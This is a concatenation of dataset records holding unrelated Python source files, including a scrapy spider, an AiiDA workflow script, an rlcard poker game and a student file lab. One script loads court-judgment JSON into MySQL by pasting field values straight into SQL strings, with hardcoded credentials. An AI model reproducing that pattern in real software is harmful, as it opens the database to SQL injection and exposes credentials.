)\n\n\n","sub_path":"Reconstruction/RecDriftChamber/tests/options/mergeHits.py","file_name":"mergeHits.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"303899765","text":"#-*- encoding: utf-8 -*-\n\nimport pprint # print dictionary contents in a cleaner way (imported but unused here)\n\nnotas = {\n\t\"Graham Chapman\": 5.5,\n\t\"John Cleese\": 7.0,\n\t\"Terry Gilliam\": 4.5,\n\t\"Terry Jone\": 4.5,\n\t\"Eric Idle\": 10,\n\t\"Michael Palin\": 3.5,\n}\n# -20 and -7 set the column widths, left-aligned\nprint(\"%-20s--+-%-7s\" % (\"-\" * 20, \"-\" * 7))\nprint(\"%-20s | %-7s\" % (\"Nome\", \"Nota\"))\nprint(\"%-20s--+-%-7s\" % (\"-\" * 20, \"-\" * 7)) # draws the dashed rule under the header\nsoma = 0\ncount = 0\nfor nome in sorted(notas):\n\tprint(\"%-20s | %4.1f\" % (nome, notas[nome]))\n\tsoma += notas[nome]\n\tcount += 1\nprint(\"%-20s--+-%-7s\" % (\"-\" * 20, \"-\" * 7))\nprint(u\"%-20s | %4.1f\" % (u\"Média\", soma/count))","sub_path":"teste.py","file_name":"teste.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
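The same table renders in Python 3 with str.format instead of %-interpolation; a minimal re-rendering of the layout with a trimmed notas dict:

notas = {"Graham Chapman": 5.5, "John Cleese": 7.0, "Eric Idle": 10}

rule = "{:-<20}--+-{:-<7}".format("", "")
print(rule)
print("{:<20} | {:<7}".format("Nome", "Nota"))
print(rule)
for nome in sorted(notas):
    print("{:<20} | {:>4.1f}".format(nome, notas[nome]))
print(rule)
print("{:<20} | {:>4.1f}".format("Média", sum(notas.values()) / len(notas)))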
+{"seq_id":"94965293","text":"#!/usr/bin/env runaiida\n# -*- coding: utf-8 -*-\n\n#\n# An example of Workchain to perform geometry relaxation\n# Note: The current input structure is non-optimal, in the\n# sense that the structure is pulled from the database, while\n# the parameters are set here. For example, the parameters are\n# taken from the 'test_siesta_geom_fail.py' legacy test, which\n# is for a water molecule.\n#\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nimport argparse\nfrom aiida.orm import Str, Float, StructureData\nfrom aiida.orm.utils import load_code, load_node\nfrom aiida.engine.launch import run\n\nfrom aiida_siesta.workflows.stm import SiestaSTMWorkChain\n\n\ndef parser_setup():\n \"\"\"\n Setup the parser of command line arguments and return it. This is separated from the main\n execution body to allow tests to effectively mock the setup of the parser and the command line arguments\n \"\"\"\n parser = argparse.ArgumentParser(\n description='Run the SiestaSTMWorkChain for a given input structure', )\n parser.add_argument(\n '-c',\n type=str,\n required=True,\n dest='codename',\n help='the name of the AiiDA code that references Siesta.siesta plugin')\n parser.add_argument(\n '-t',\n type=str,\n required=True,\n dest='stm_codename',\n help='the name of the AiiDA code that references Siesta.stm plugin')\n parser.add_argument('-p',\n type=str,\n required=False,\n dest='protocol',\n default='standard',\n help='the protocol (default: %(default)s)')\n parser.add_argument('-s',\n type=int,\n required=False,\n dest='structure',\n default=0,\n help='the node id of the structure')\n parser.add_argument(\n '-z',\n type=float,\n required=False,\n dest='height',\n default=7.5,\n help='the height (in Ang) at which to compute the image')\n parser.add_argument('-e',\n type=float,\n required=False,\n dest='e1',\n default=-5.0,\n help='the lower limit of the energy window')\n parser.add_argument('-E',\n type=float,\n required=False,\n dest='e2',\n default=1.0,\n help='the upper limit of the energy window')\n\n return parser\n\n\ndef execute(args):\n \"\"\"\n The main execution of the script, which will run some preliminary checks on the command\n line arguments before passing them to the workchain and running it\n \"\"\"\n code = load_code(args.codename)\n stm_code = load_code(args.stm_codename)\n height = Float(args.height)\n e1 = Float(args.e1)\n e2 = Float(args.e2)\n\n protocol = Str(args.protocol)\n\n alat = 15. 
# angstrom\n cell = [\n [\n alat,\n 0.,\n 0.,\n ],\n [\n 0.,\n alat,\n 0.,\n ],\n [\n 0.,\n 0.,\n alat,\n ],\n ]\n\n # Benzene molecule\n #\n s = StructureData(cell=cell)\n\n def perm(x, y, z):\n return (z, y + 0.5 * alat, x + 0.5 * alat)\n\n s.append_atom(position=perm(0.000, 0.000, 0.468), symbols=['H'])\n s.append_atom(position=perm(0.000, 0.000, 1.620), symbols=['C'])\n s.append_atom(position=perm(0.000, -2.233, 1.754), symbols=['H'])\n s.append_atom(position=perm(0.000, 2.233, 1.754), symbols=['H'])\n s.append_atom(position=perm(0.000, -1.225, 2.327), symbols=['C'])\n s.append_atom(position=perm(0.000, 1.225, 2.327), symbols=['C'])\n s.append_atom(position=perm(0.000, -1.225, 3.737), symbols=['C'])\n s.append_atom(position=perm(0.000, 1.225, 3.737), symbols=['C'])\n s.append_atom(position=perm(0.000, -2.233, 4.311), symbols=['H'])\n s.append_atom(position=perm(0.000, 2.233, 4.311), symbols=['H'])\n s.append_atom(position=perm(0.000, 0.000, 4.442), symbols=['C'])\n s.append_atom(position=perm(0.000, 0.000, 5.604), symbols=['H'])\n\n if args.structure > 0:\n structure = load_node(args.structure)\n else:\n structure = s\n\n run(SiestaSTMWorkChain,\n code=code,\n stm_code=stm_code,\n structure=structure,\n protocol=protocol,\n height=height,\n e1=e1,\n e2=e2)\n\n\ndef main():\n \"\"\"\n Setup the parser to retrieve the command line arguments and pass them to the main execution function.\n \"\"\"\n parser = parser_setup()\n args = parser.parse_args()\n execute(args)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"aiida_siesta/examples/workflows/test_stm_wk.py","file_name":"test_stm_wk.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
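The script is meant to be launched through runaiida (see the shebang); -c and -t are the only required flags and must name AiiDA codes configured for the Siesta and STM plugins. The code labels below are placeholders, not taken from the file:

runaiida test_stm_wk.py -c siesta@localhost -t stm@localhost -z 7.5 -e -5.0 -E 1.0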
+{"seq_id":"374266067","text":"import json\nimport re\n\nimport scrapy\n\nfrom locations.items import Feature\n\n\nclass TheBurgersPriestSpider(scrapy.Spider):\n name = \"the_burgers_priest\"\n item_attributes = {\"brand\": \"The Burger's Priest\", \"brand_wikidata\": \"Q100255453\"}\n allowed_domains = [\"theburgerspriest.com\"]\n start_urls = [\n \"https://theburgerspriest.com/find-a-location/\",\n ]\n\n def parse(self, response):\n data = response.xpath('//script[contains(text(),\"locations\")]/text()').extract_first()\n\n ## Fix lots of formatting issues\n json_data = re.sub(r\"var images\\s=\\s((?s).*?)var locations = \", \"\", data)\n json_data = re.sub(r'\"photo\"\\s:\\s((?s).*?),', \"\", json_data)\n json_data = re.sub(r'\"hours\"\\s:\\s((?s).*?)],', '\"hours\" : []', json_data)\n json_data = re.sub(r'\"description\"\\s:\\s((?s).*?)\",', \"\", json_data)\n json_data = json_data.replace(\";\", \"\")\n json_data = json_data[:-12]\n json_data = json_data + \"]}\"\n\n places = json.loads(json_data)\n\n for place in places[\"features\"]:\n try:\n ref = re.search(r\".com\\/(.*)\", place[\"properties\"][\"url\"]).groups()[0]\n except:\n ref = place[\"properties\"][\"name\"]\n\n properties = {\n \"ref\": ref,\n \"name\": place[\"properties\"][\"name\"],\n \"addr_full\": place[\"properties\"][\"address\"],\n \"city\": place[\"properties\"][\"city\"],\n \"state\": place[\"properties\"][\"provShort\"],\n \"country\": \"CA\",\n \"lat\": place[\"geometry\"][\"coordinates\"][1],\n \"lon\": place[\"geometry\"][\"coordinates\"][0],\n \"phone\": place[\"properties\"][\"phone\"],\n \"website\": place[\"properties\"][\"url\"],\n }\n\n yield Feature(**properties)\n","sub_path":"locations/spiders/the_burgers_priest.py","file_name":"the_burgers_priest.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
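The fragile part of this spider is carving a JSON object out of inline JavaScript with chained re.sub calls. A toy reproduction of the first and last cleanup steps on an invented script string; note the (?s) flag is placed at the start of the pattern here, since Python 3.11+ rejects global inline flags that appear mid-pattern (as they do in the spider above):

import json
import re

data = 'var images = {"a": 1};var locations = {"features": []};'
json_data = re.sub(r"(?s)var images\s=\s(.*?)var locations = ", "", data)
json_data = json_data.replace(";", "")
print(json.loads(json_data))  # {'features': []}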
+{"seq_id":"70875028","text":"YEAR = ['0910','1011','1112','1213'];\nGRADE = ['K1','K2','06','09'];\nALG = ['TTC','ClinchTrade','FirstClinchTrade','DA','ETTC','RSD','PTC','PCT'];\nN=50;\n\ncount=0;\nsyst = '\\\\'\n\nif (syst == '\\\\'):\n inpath = 'P:\\\\RA\\\\vira\\\\code\\\\vira\\\\AllProjectCodes\\\\BPS+Simulations'\n #outpath = 'P:\\\\RA\\\\vira\\\\code\\\\parag\\\\BPS\\\\outputs\\\\';\nif (syst == '/'):\n inpath = '/proj/pppathak/RA/vira/code/vira/AllProjectCodes/BPS+Simulations'\n outpath = '/proj/pppathak/RA/vira/code/parag/BPS/outputs/';\npath=inpath;\n#YEAR=['1112','1213'];\nfor year in YEAR:\n for grade in GRADE:\n for alg in ['PTC']:\n count=count+1;\n f = open(path+syst+'Scripts'+syst+'PTC50'+str(count)+'.sh','wb');\n f.write('export YEAR='+year+'\\n');\n f.write('export GRADE='+grade+'\\n');\n f.write('export N='+str(N)+'\\n');\n f.write('export ALG='+alg+'\\n');\n inpath = '/proj/pppathak/RA/vira/code/vira/AllProjectCodes/BPS+Simulations'\n f.write('cd '+inpath+'\\n');\n f.write('python '+inpath+'/Statisticsv1.py'+'\\n');\n f.close()\n\n \n","sub_path":"ShScriptsBPS.py","file_name":"ShScriptsBPS.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
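For reference, each file this script emits is four exports plus a cd and a python call; with count starting at 1, the first generated Scripts/PTC501.sh (year 0910, grade K1) comes out as:

export YEAR=0910
export GRADE=K1
export N=50
export ALG=PTC
cd /proj/pppathak/RA/vira/code/vira/AllProjectCodes/BPS+Simulations
python /proj/pppathak/RA/vira/code/vira/AllProjectCodes/BPS+Simulations/Statisticsv1.py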
+{"seq_id":"229261244","text":"#!/usr/bin/env python3\n# -----------------------------------------------------------------------------\n# Copyright (c) 2016+ Buro Petr van Blokland + Claudia Mens\n# www.pagebot.io\n#\n# P A G E B O T\n#\n# Licensed under MIT conditions\n#\n# Supporting DrawBot, www.drawbot.com\n# Supporting Flat, xxyxyz.org/flat\n# -----------------------------------------------------------------------------\n#\n# drawSpirals.py\n#\n\nfrom pagebot.toolbox.units import pt\nfrom pagebot.toolbox.color import noColor, blackColor\nfrom pagebot import getContext\nc = getContext()\n#import pagebot # Import to know the path of non-Python resources.\n\nX = 0\nY = 0\nN = 8*8\nSx = 10\nSy = 10\nExy = 0.58\nD = 0.5\n\n# hardcoded constants:\nW = H = 1000\nM = 20\nw = W - 2*M\nh = H - 2*H\n\n#dict(name='ElementOrigin', ui='CheckBox', args=dict(value=False)),\nc.Variable(\n [dict(name='X', ui='Slider',\n args=dict(minValue=-W/2, value=0, maxValue=W/2)),\n dict(name='Y', ui='Slider',\n args=dict(minValue=-H/2, value=0, maxValue=H/2)),\n dict(name='N', ui='Slider',\n args=dict(minValue=8*2, value=8*8, maxValue=8*32)),\n dict(name='Sx', ui='Slider',\n args=dict(minValue=2, value=10, maxValue=40)),\n dict(name='Sy', ui='Slider',\n args=dict(minValue=2, value=10, maxValue=40)),\n dict(name='Exy', ui='Slider',\n args=dict(minValue=0.01, value=0.58, maxValue=1)),\n dict(name='D', ui='Slider',\n args=dict(minValue=0.1, value=0.5, maxValue=5))\n ], globals())\n\ndef drawSpiral():\n mx = W/2+X\n my = H/2+Y\n runs = False\n c.newPath()\n c.moveTo((pt(mx), pt(my)))\n \n for n in range(0, int(N), 4):\n dx1 = n*Sx*D\n dy1 = n*Sy*D\n dx2 = (n+1)*Sx*D\n dy2 = (n+1)*Sy*D\n dx3 = (n+2)*Sx*D\n dy3 = (n+2)*Sy*D\n dx4 = (n+3)*Sx*D\n dy4 = (n+3)*Sy*D\n #dx5 = (n+4)*Sx*D\n #dy5 = (n+4)*Sy*D\n if not runs:\n c.moveTo((pt(mx), pt(my)))\n else:\n c.curveTo((pt(mx-dx1*Exy), pt(my-dy1)),\n (pt(mx-dx1), pt(my-dy1*Exy)), (pt(mx-dx1), pt(my)))\n c.curveTo((pt(mx-dx2), pt(my+dy2*Exy)),\n (pt(mx-dx2*Exy), pt(my+dy2)), (pt(mx), pt(my+dy2)))\n c.curveTo((pt(mx+dx3*Exy), pt(my+dy3)),\n (pt(mx+dx3), pt(my+dy3*Exy)), (pt(mx+dx3), pt(my)))\n c.curveTo((pt(mx+dx4), pt(my-dy4*Exy)), (pt(mx+dx4*Exy), pt(my-dy4)),\n (pt(mx), pt(my-dy4)))\n runs = True\n\n c.fill(noColor)\n c.stroke(blackColor)\n c.drawPath()\n\nc.newPage(pt(W), pt(H))\ndrawSpiral()\nc.saveImage(\"_export/Spiral.pdf\")\n","sub_path":"Examples/04_Drawing/DrawSpirals.py","file_name":"DrawSpirals.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"463661777","text":"import pandas as pd\n\nclass FileLoader:\n def load(self, path):\n try:\n df=pd.read_csv(path)\n print(f\"Loading dataset of dimensions {df.shape[0]} x {df.shape[1]}\")\n return df\n except Exception as e:\n print(f\"Error {e}\")\n return None\n \n def display(self, df, n):\n if isinstance(df, pd.DataFrame):\n if n > 0:\n print(df.head(n))\n else:\n print(df.tail(abs(n)))\n else:\n print(\"Provided data is not valid pandas Dataframe\")","sub_path":"day04/ex05/FileLoader.py","file_name":"FileLoader.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
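Typical use pairs load with display; a positive n shows the first n rows, a negative n the last |n|. A short sketch (the CSV path is a placeholder):

from FileLoader import FileLoader

loader = FileLoader()
df = loader.load("../data/athlete_events.csv")  # prints "Loading dataset of dimensions R x C"
if df is not None:
    loader.display(df, 3)   # head: first 3 rows
    loader.display(df, -2)  # tail: last 2 rows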
+{"seq_id":"454259579","text":"#!/usr/bin/env python3\n\n\"\"\"\nParser for run_mosdepth.sh\n\"\"\"\n\nimport logging\nimport csv\n\nfrom multiqc.utils import config, report\n\nlog = logging.getLogger(__name__)\n\n\ndef parse_reports(self):\n\n # Set up vars\n self.mosdepth = dict()\n\n # Collect metrics\n for f in self.find_log_files('multiqc_npm/mosdepth', filehandles=True):\n\n # Collect relevant records and calculate metrics\n vals = list()\n for l in f[\"f\"]:\n v = l.strip(\"\\n\").split(\",\")\n vals.append(v)\n parsed_data = dict(zip(vals[0], vals[1]))\n\n # Save results\n s_name = f[\"s_name\"]\n self.mosdepth[s_name] = parsed_data\n\n # Write results\n if len(self.mosdepth) > 0:\n\n # Write parsed data to a file\n self.write_data_file(self.mosdepth, 'multiqc_npm_mosdepth')\n\n # Return the number of detected samples to the parent module\n return len(self.mosdepth)\n","sub_path":"multiqc_npm/modules/npm_mosdepth.py","file_name":"npm_mosdepth.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
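parse_reports expects each matched log to be a two-line CSV, a header row and one value row, which vals[0] and vals[1] zip into a dict. A standalone sketch of that step on an invented payload (the column names are placeholders):

import io

f = io.StringIO("mean_coverage,pct_30x\n31.7,92.4\n")
vals = [line.strip("\n").split(",") for line in f]
parsed_data = dict(zip(vals[0], vals[1]))
print(parsed_data)  # {'mean_coverage': '31.7', 'pct_30x': '92.4'}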
+{"seq_id":"494492188","text":"# An Vo\n# CSC119.103\n# April 23, 2018\n#\n# Lab 10\n\n\ndef keepGoing():\n    x = input('Would you like to keep modifying files? (Y/N)').lower()\n    while x not in ('y', 'n'):\n        x = input('Invalid answer. Would you like to continue? (Y/N)').lower()\n    return x == 'y'\n\n\ndef nameFile():\n    name = input('What is the name of the file?: ')\n    return name\n\n\ndef createFile(name):\n    inputFile = open(name, 'w')\n    line = input(\"Enter a line. Enter 'quit' to end: \")\n    while line != 'quit':\n        line = line + '\\n'\n        inputFile.write(line)\n        line = input(\"Enter a line. Enter 'quit' to end: \")\n    inputFile.close()\n\n\ndef addInFile(name):\n    inputFile = open(name, 'a')  # append mode: new lines go at the end of the file\n    line = input(\"Enter a line. Enter 'quit' to end: \")\n    while line != 'quit':\n        line = line + '\\n'\n        inputFile.write(line)\n        line = input(\"Enter a line. Enter 'quit' to end: \")\n    inputFile.close()\n\n\ndef printFile(name):\n    try:\n        inputFile = open(name, 'r')\n        for innerLine in inputFile:\n            fields = innerLine.split(',')\n            print('{:15s}{:>5s}{:5s}{:<10s}{:>15s}{:>15s}'.format(fields[0], fields[1], '', fields[2],fields[3], fields[4]))\n        inputFile.close()\n    except IOError:\n        print(\"The file '\" + name + \"' does not exist, please enter valid file\")\n        printFile(nameFile())\n\n\ndef whatToDo():\n    print()\n    print('What would you like to do with a file?')\n    print('Create a new file (C).\\nAdd to a file (A).\\nRead a file (R).')\n    x = input().lower()\n    valid = True\n    while valid:\n        if x == 'c' or x == 'a' or x == 'r':\n            valid = False\n            return x\n        else:\n            x = input('Please enter valid choice. ')\n\n\ndef pathway(choice):\n    if choice == 'c':\n        createFile(nameFile())\n    if choice == 'a':\n        addInFile(nameFile())\n    if choice == 'r':\n        printFile(nameFile())\n\n\nx = True\nwhile x:\n    pathway(whatToDo())\n    x = keepGoing()\nprint()\nprint('Thank you for using this program')\n\n\n\n\n\n\n","sub_path":"IntroToCSC - ACC/Labs/Lab 10.py","file_name":"Lab 10.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
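printFile assumes comma-separated rows with at least five fields per line; a file readable through option R could contain rows like these invented ones:

Ada Lovelace,36,math,London,1815
Alan Turing,41,logic,Wilmslow,1912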
+{"seq_id":"285951700","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 17 13:31:41 2019\n\n@author: user\n\n\ndirPath = r\"E:\\\\Download\\\\20190701法律科技開放法學資料\\\\python測試\\\\福建連江地方法院\"\n\"\"\"\n\nimport pymysql\nimport json\nimport os \n \ndirPath = r\"E:\\\\Download\\\\20190701法律科技開放法學資料\\\\python測試\\\\智慧財產法院\"\nresult = [f for f in os.listdir(dirPath) if os.path.isfile(os.path.join(dirPath, f))]\n\nfor j in result:\n    with open((dirPath+\"\\\\\"+j),mode='r', encoding='UTF-8') as f:\n        def readJSON(key):\n            with open(\"E:\\\\Download\\\\20190701法律科技開放法學資料\\\\python測試\\\\智慧財產法院\\\\\"+j+\"\", encoding=\"utf-8\") as JS:\n                reading = json.load(JS)\n                a=json.dumps(reading[\"court\"],ensure_ascii=False)\n                b=json.dumps(reading[\"date\"],ensure_ascii=False)\n                c=json.dumps(reading[\"no\"],ensure_ascii=False)\n                d=json.dumps(reading[\"sys\"],ensure_ascii=False)\n                e=json.dumps(reading[\"reason\"],ensure_ascii=False)\n                f=json.dumps(reading[\"judgement\"],ensure_ascii=False)\n                db = pymysql.connect(host='localhost', port=3307, user='Flash', passwd='THE_FLASH', db='7月新的資料', charset='utf8')\n                \n                a=a.replace('\"',\"\")\n                b=b.replace('\"',\"\")\n                c=c.replace('\"',\"\")\n                d=d.replace('\"',\"\")\n                e=e.replace('\"',\"\")\n                f=f.replace('\"',\"\")\n                f=f.replace(\"\\\\\",\"\") \n                f=f.replace('r','')\n                f=f.replace('n','')\n                \"\"\"\n                主文=c.find('主 文')\n                理由=c.find('理 由')\n                理由結束=c.find('中 華 民 國')\n                審判長法官=c.find('審判長法官')\n                法官2=c.find('法官',(審判長法官+14))\n                法官3=c.find('法官',(法官2+14))\n                法官4=c.find('法官',(法官3+14))\n                法官5=c.find('法官',(法官4+14))\n                j主=c[(主文+4):(理由)]\n                j理=c[(理由+4):(理由結束)]\n                j審=c[(審判長法官+7):(審判長法官+14)]\n                j官1=c[(法官2+4):(法官2+14)]\n                j官2= c[(法官3+4):(法官3+14)]\n                j官3= c[(法官4+4):(法官4+14)]\n                j官4=c[(法官5+4):(法官5+14)]\n                \"\"\"\n                # create a cursor for executing statements\n                cursor = db.cursor()\n                # SQL statement\n                sql = \"INSERT INTO 智慧財產法院(jcourt,jdate,jno,jsys,jreason,jjudegement) VALUES ('\"+a+\"','\"+b+\"','\"+c+\"','\"+d+\"','\"+e+\"','\"+f+\"')\" \n                try:\n                    cursor.execute(sql)\n                    # commit the changes\n                    db.commit()\n                    print('success')\n                except pymysql.MySQLError:\n                    # roll back instead of executing further SQL when an error occurs\n                    db.rollback()\n                    print('error')\n                # close the connection\n                db.close()\n                print(reading[key])\n                JS.close()\n        readJSON(\"no\")","sub_path":"pymysql_餵7月新資料.py","file_name":"pymysql_餵7月新資料.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
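The quote-stripping above exists only because the values are spliced into the SQL string by hand; passing them as parameters lets the driver do the escaping. A minimal sketch against the same table, with invented row values (connection settings copied from the script):

import pymysql

db = pymysql.connect(host='localhost', port=3307, user='Flash',
                     passwd='THE_FLASH', db='7月新的資料', charset='utf8')
cursor = db.cursor()
sql = ("INSERT INTO 智慧財產法院"
       "(jcourt,jdate,jno,jsys,jreason,jjudegement) "
       "VALUES (%s, %s, %s, %s, %s, %s)")
row = ("智慧財產法院", "20190501", "107,民專訴,1", "民事", "侵害專利權", "...judgement text...")
cursor.execute(sql, row)  # pymysql escapes each value, quotes and commas included
db.commit()
db.close()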
+{"seq_id":"168957327","text":"import random\nfrom copy import deepcopy\n\nfrom rlcard.games.limitholdem.dealer import LimitholdemDealer as Dealer\nfrom rlcard.games.limitholdem.player import LimitholdemPlayer as Player\nfrom rlcard.games.limitholdem.judger import LimitholdemJudger as Judger\nfrom rlcard.games.limitholdem.round import LimitholdemRound as Round\n\nclass LimitholdemGame(object):\n\n    def __init__(self):\n        ''' Initialize the class limitholdem Game\n        '''\n\n        super().__init__()\n\n        # Some configurations of the game\n        # These arguments can be specified for creating new games\n\n        # Small blind and big blind\n        self.small_blind = 1\n        self.big_blind = 2 * self.small_blind\n\n        # Raise amount and allowed times\n        self.raise_amount = 2 * self.big_blind\n        self.allowed_raise_num = 4\n\n        self.num_players = 2\n\n    def init_game(self):\n        ''' Initialize the game of Limit Texas Hold'em\n\n        This version supports two-player limit texas hold'em\n\n        Returns:\n            (tuple): Tuple containing:\n\n                (dict): The first state of the game\n                (int): Current player's id\n        '''\n\n        # Initialize a dealer that can deal cards\n        self.dealer = Dealer()\n\n        # Initialize two players to play the game\n        self.players = [Player(i) for i in range(self.num_players)]\n\n        # Initialize a judger class which will decide who wins in the end\n        self.judger = Judger()\n\n        # Deal cards to each player to prepare for the first round\n        for i in range(2 * self.num_players):\n            self.players[i % self.num_players].hand.append(self.dealer.deal_card())\n\n        # Initialize public cards\n        self.public_cards = []\n\n        # Randomly choose a big blind and a small blind\n        b = random.randint(0, self.num_players-1)\n        s = (b + 1) % self.num_players\n        self.players[b].in_chips = self.big_blind\n        self.players[s].in_chips = self.small_blind\n\n        # The player next to the small blind plays the first\n        self.button = (s + 1) % self.num_players\n\n        # Initialize a bidding round; in the first round, the big blind and the small blind need to\n        # be passed to the round for processing.\n        self.round = Round(raise_amount=self.raise_amount,\n                           allowed_raise_num=self.allowed_raise_num,\n                           num_players=self.num_players)\n\n        self.round.start_new_round(button=self.button, raised=[p.in_chips for p in self.players])\n\n        # Count the round. There are 4 rounds in each game.\n        self.round_counter = 0\n\n        # Save the history for stepping back to the last state.\n        self.history = []\n\n        state = self.get_state(self.button)\n\n        return state, self.button\n\n    def step(self, action):\n        ''' Get the next state\n\n        Args:\n            action (str): a specific action. 
(call, raise, fold, or check)\n\n        Returns:\n            (tuple): Tuple containing:\n\n                (dict): next player's state\n                (int): next player's id\n        '''\n\n        # First snapshot the current state\n        r = deepcopy(self.round)\n        b = self.button\n        r_c = self.round_counter\n        d = deepcopy(self.dealer)\n        p = deepcopy(self.public_cards)\n        ps = deepcopy(self.players)\n        self.history.append((r, b, r_c, d, p, ps))\n\n        # Then we proceed to the next round\n        self.button = self.round.proceed_round(self.players, action)\n\n        # If a round is over, we deal more public cards\n        if self.round.is_over():\n            # For the first round, we deal 3 cards\n            if self.round_counter == 0:\n                self.public_cards.append(self.dealer.deal_card())\n                self.public_cards.append(self.dealer.deal_card())\n                self.public_cards.append(self.dealer.deal_card())\n            # For the following rounds, we deal only 1 card\n            elif self.round_counter <= 2:\n                self.public_cards.append(self.dealer.deal_card())\n\n            self.round_counter += 1\n            self.round.start_new_round(self.button)\n\n        state = self.get_state(self.button)\n\n        return state, self.button\n\n    def step_back(self):\n        ''' Return to the previous state of the game\n\n        Returns:\n            (bool): True if the game steps back successfully\n        '''\n\n        if len(self.history) > 0:\n            self.round, self.button, self.round_counter, self.dealer, self.public_cards, self.players = self.history.pop()\n            return True\n        return False\n\n    def get_player_num(self):\n        ''' Return the number of players in Limit Texas Hold'em\n\n        Returns:\n            (int): The number of players in the game\n        '''\n\n        return self.num_players\n\n    @staticmethod\n    def get_action_num():\n        ''' Return the number of applicable actions\n\n        Returns:\n            (int): The number of actions. There are 4 actions (call, raise, check and fold)\n        '''\n\n        return 4\n\n    def get_player_id(self):\n        ''' Return the current player's id\n\n        Returns:\n            (int): current player's id\n        '''\n\n        return self.button\n\n    def get_state(self, player):\n        ''' Return player's state\n\n        Args:\n            player (int): player id\n\n        Returns:\n            (dict): The state of the player\n        '''\n\n        chips = [self.players[i].in_chips for i in range(self.num_players)]\n        state = self.players[player].get_state(self.public_cards, chips)\n\n        return state\n\n\n    def is_over(self):\n        ''' Check if the game is over\n\n        Returns:\n            (boolean): True if the game is over\n        '''\n\n        alive_players = [1 if p.status=='alive' else 0 for p in self.players]\n        # If only one player is alive, the game is over.\n        if sum(alive_players) == 1:\n            return True\n\n        # If all rounds are finished\n        if self.round_counter >= 4:\n            return True\n        return False\n\n    def get_payoffs(self):\n        ''' Return the payoffs of the game\n\n        Returns:\n            (list): Each entry corresponds to the payoff of one player\n        '''\n\n        hands = [p.hand + self.public_cards if p.status=='alive' else None for p in self.players]\n        payoffs = self.judger.judge_game(self.players, hands)\n        return payoffs\n\n    def get_legal_actions(self):\n        ''' Return the legal actions for current player\n\n        Returns:\n            (list): A list of legal actions\n        '''\n\n        return self.round.get_legal_actions()\n\n# Test the game\n\nif __name__ == \"__main__\":\n    game = LimitholdemGame()\n    while True:\n        print('New Game')\n        state, button = game.init_game()\n        print(button, state)\n        i = 1\n        while not game.is_over():\n            i += 1\n            legal_actions = game.get_legal_actions()\n            if i == 3:\n                print('Step back')\n                print(game.step_back())\n                button = game.get_player_id()\n                print(button)\n                legal_actions = game.get_legal_actions()\n\n            action = random.choice(legal_actions)\n            print(button, action, 
legal_actions)\n state, button = game.step(action)\n print(button, state)\n\n print(game.get_payoffs())\n\n","sub_path":"rlcard/games/limitholdem/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":7343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"209023376","text":"from utils import database\r\nfrom Locators.types import types\r\nfrom Pages.allPages import AllPages\r\n\r\nall_goods = []\r\n\r\nfor link in types.product_to_name.values():\r\n print(link)\r\n items = AllPages(link).items\r\n all_goods.extend(items)\r\n\r\n # data can be added to database directly from here (so next lines will be unnecessary)\r\n # for item in items:\r\n # database.addOne(item.category, item.name, item.city, item.price)\r\n\r\n\r\nwith open(\"data.txt\", \"a\", encoding=\"utf-8\") as f:\r\n for i in all_goods:\r\n f.write(f'{i.category}:#: {i.name}:#: {i.city}:#: {i.price}\\n')\r\n # data can be added directly from here\r\n # database.addOne(i.category, i.name, i.city, i.price)\r\n\r\n\r\ndatabase.createDatabase()\r\ndatabase.updateAll('data.txt')\r\ndatabase.seeAll()\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"610675963","text":"import os\r\nimport gym\r\nimport vgdl\r\nimport vgdl.interfaces.gym\r\n\r\nfrom PIL import Image\r\n# from vgdl.util.humanplay.play_vgdl import register_vgdl_env\r\n\r\n\r\ndef register_vgdl_env(domain_file, level_file, observer=None, blocksize=None):\r\n from gym.envs.registration import register, registry\r\n level_name = '.'.join(os.path.basename(level_file).split('.')[:-1])\r\n env_name = 'vgdl_{}-v0'.format(level_name)\r\n\r\n register(\r\n id=env_name,\r\n entry_point='vgdl.interfaces.gym:VGDLEnv',\r\n kwargs={\r\n 'game_file': domain_file,\r\n 'level_file': level_file,\r\n 'block_size': blocksize,\r\n 'obs_type': observer or 'features',\r\n },\r\n #timestep_limit=10000,\r\n max_episode_steps=250,\r\n nondeterministic=True\r\n )\r\n\r\n return env_name\r\n\r\n\r\n# env = gym.make('gvgai-aliens-lvl0-v0')\r\n#############################################################################\r\n# vgdl.registry.register_from_string(\"vgdl.util.humanplay.play_vgdl\")\r\n\r\n# Fichero de dominio, fichero de nivel, observer, blocksize\r\n# env_name = register_vgdl_env(\"vgdl/games/aliens.txt\", \"vgdl/games/aliens_lvl0.txt\", None, 32)\r\nenv_name = register_vgdl_env(\"gvg_games/aliens_v0/aliens.txt\", \"gvg_games/aliens_v0/aliens_lvl0.txt\", 'image', 32)\r\n\r\n# ¿Tal vez haga falta?\r\nenv = gym.make(env_name)\r\n#############################################################################\r\n# obs = env.render(mode='rgb_array')\r\n# obs = 